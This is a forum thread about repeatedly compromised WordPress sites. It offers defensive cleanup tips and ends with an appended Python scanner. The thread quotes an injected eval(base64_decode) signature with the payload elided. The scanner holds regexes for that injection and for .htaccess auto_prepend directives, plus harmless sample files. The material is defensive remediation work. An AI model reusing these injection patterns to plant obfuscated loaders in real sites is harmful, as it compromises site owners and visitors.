
Sites keep getting hacked, could use a little help.

Discussion in 'BlackHat Lounge' started by 67731, Oct 9, 2012.

  1. 67731

    67731 Regular Member

    Joined:
    Aug 27, 2011
    Messages:
    231
    Likes Received:
    47
    Occupation:
    SEO TECH - Looking to work for myself. . .
    Location:
    Las Vegas NV
    My sites are all on Wordpress, and they keep getting hacked. I have taken them all off line and am cleaning them one by one before putting them back.

    I have 10 sites online now, and it happened again, does anyone know a good database scanner?

    And anything else that you may know would help out a lot!
     
  2. nerdmoney

    nerdmoney Junior Member

    Joined:
    Feb 24, 2008
    Messages:
    135
    Likes Received:
    37
    Occupation:
    web nerd
    Make sure you overwrite with a download version of the latest WP distribution; don't just use the built-in update, as there is a hack that targets updates. Obviously change all passwords, including cPanel. Check your custom themes and use the timthumb vulnerability scanner plugin. If it happens after all that, your host may have been hacked. PM if that doesn't work and I'll take a look for you.
     
  3. 67731

    67731 Regular Member

    Thanks, another good scanner I would recommend to people is Wordfence, this has been great to let me know if things are still happening. Whatever has been hacking my site seems to start out by placing some bad code in the index.php of the site.

    So I have changed that to file permission 444, and that has seemed to help.

    I am not sure if it's the Google update or my site being hacked, but for some reason all my pages are not seeming to rank, as in it looks like they are all deindexed. . . I would love for someone to take a look at the site and see if they can see a reason for this.
     
  4. gamingmaster42

    gamingmaster42 Regular Member

    Joined:
    Jul 21, 2010
    Messages:
    473
    Likes Received:
    176
  5. 67731

    67731 Regular Member

  6. drywallrob

    drywallrob Jr. VIP Jr. VIP Premium Member

    Joined:
    Apr 27, 2011
    Messages:
    992
    Likes Received:
    476
    I have used these guys, and they do a good job.

    http://sucuri.net/

    I had a similar issue. I tried to do it myself and got frustrated after 4 hours...
     
  7. BlueNebula

    BlueNebula Junior Member

    Joined:
    Nov 25, 2009
    Messages:
    100
    Likes Received:
    59
    Occupation:
    Experienced Marketer and Team Leader
    Location:
    Andromeda Galaxy
    What is your definition of getting "hacked"? I know some people who leave their Facebook open and someone updates their status to something laughable, and they consider it being "hacked". If you're just getting a lot of spam, obviously use an anti-spam plugin. If someone is actually gaining access to your admin panel, change your password. However, if it's happening to all your sites, I'm assuming you are hosting all your WP sites on a single hosting account.
     
  8. 67731

    67731 Regular Member


    1: When someone was able to upload a FULL wordpress install in a subfolder and use my database

    2: when pulling every file off my server and finding something like 1200 times when code like this has been placed all over just about EVERY file.

    eval(base64_decode("..."));
     
  9. david4weaver

    david4weaver BANNED BANNED

    Joined:
    Nov 26, 2011
    Messages:
    18
    Likes Received:
    13
    Dude, you are in a funny position ..... lol.
     
  10. BlueNebula

    BlueNebula Junior Member

    Are all your WP hosted on a single account?
     
  11. ice41

    ice41 Power Member

    Joined:
    Aug 18, 2012
    Messages:
    783
    Likes Received:
    248
    Occupation:
    Web Designer
    Location:
    Land of Pineapples
    That, my friend, is not a hack, that is called injection. Your pages had been injected, check your functions.php and other php files. Software installs and such. If you can't find it, delete everything and start from scratch. Less headache, more time to work for you.
     
  12. 67731

    67731 Regular Member


    Yep, all on one account. (1nad1)
     
  13. 67731

    67731 Regular Member


    That's what I have been doing, the only things I kept were the database, theme (custom built by me) and the plugins.

    Everything was fine and clean for about two weeks but then today it came back, WordFence has done a great job at scanning the plugins, I am starting to think there must be something in the database of a site.

    I have 1: replaced all wordpress files 2: changed database passwords 3: changed keycodes (https://api.wordpress.org/secret-key/1.1/salt/) 4: cleaned all files going back in and uploaded everything.
     
  14. private parts

    private parts Newbie

    Joined:
    Oct 8, 2012
    Messages:
    6
    Likes Received:
    6
    It seems your website is not protected against SQL injection. They usually put code in a form or something else that has the PHP POST function.
    Do you have some kind of form somewhere? Try adding captchas and checking WP for anti-SQL-injection plugins.

    good luck.
     
  15. hpv222

    hpv222 Power Member

    Joined:
    Feb 8, 2010
    Messages:
    736
    Likes Received:
    274
    I had to deal with the same situation - all my WP sites on 2 different hosts (one in Europe and one in the US); you should clean everything up, check your htaccess files too, mine had shit injected there too, make sure that they are properly CHMODed after that, most of the injections I found in the themes' .php files though; update your WPs, and also contact your host and let them know
     
  16. hpv222

    hpv222 Power Member

    one more thing - check if Google has detected malware on your sites; if they have, all your users using Chrome will get a warning when opening your sites and your sites will be taken off the listings; all you have to do is verify that you own the sites and send them for reconsideration - BTW, they are pretty quick at checking and re-listing the sites
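
The checks discussed across this thread (the `eval(base64_decode(...))` pattern, an extra WordPress install in a subfolder, injected `.htaccess` lines, and file permissions) can be run in one pass over a downloaded copy of a site. This is an added example, not code from any poster or from Wordfence or Sucuri; the `.htaccess` heuristics, the file-suffix list and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Pattern quoted in the thread, allowing whitespace and nested decode wrappers.
INJECT_RE = re.compile(rb"eval\s*\(\s*(?:(?:gzinflate|gzuncompress|str_rot13)"
                       rb"\s*\(\s*)*base64_decode\s*\(", re.IGNORECASE)
# Assumed heuristics for injected .htaccess lines; tune them for your sites.
HTACCESS_RE = re.compile(rb"php_value\s+auto_(?:prepend|append)_file|RewriteCond"
                         rb"\s+%\{HTTP_REFERER\}.*(?:google|bing|yahoo)", re.I)
CORE_MARKERS = {"wp-config.php", "wp-login.php"}

def scan(site_root):
    """Return sorted (relative_path, reason) findings for one WordPress root."""
    root, findings = Path(site_root), []
    for path in (p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        is_php = path.suffix.lower() in {".php", ".phtml", ".inc"}
        is_hta = path.name == ".htaccess"
        if path.parent != root and path.name in CORE_MARKERS:
            findings.append((rel, "second WordPress install"))
        if not (is_php or is_hta):
            continue
        data = path.read_bytes()
        if is_php and INJECT_RE.search(data):
            findings.append((rel, "eval(base64_decode) injection"))
        if is_hta and HTACCESS_RE.search(data):
            findings.append((rel, "suspicious .htaccess directive"))
        if path.stat().st_mode & 0o022:
            findings.append((rel, "group/world-writable"))
    return sorted(findings)

def build_sample(site_root):
    """Write a constructed test tree (not real malware) under site_root."""
    files = {
        "index.php": b'<?php eval ( base64_decode("Q09OU1RSVUNURUQ="));',
        "wp-config.php": b"<?php // legitimate config",
        "old/wp-config.php": b"<?php // unexpected nested copy",
        ".htaccess": b"php_value auto_prepend_file /tmp/x.php\n",
    }
    for rel, body in files.items():
        path = Path(site_root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body)
        path.chmod(0o644)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*scan(tmp), sep="\n")
```

A clean result from a pattern scan like this only means these specific markers are absent; the original entry point (a vulnerable plugin, theme or stolen credential) still has to be closed or the files will be modified again.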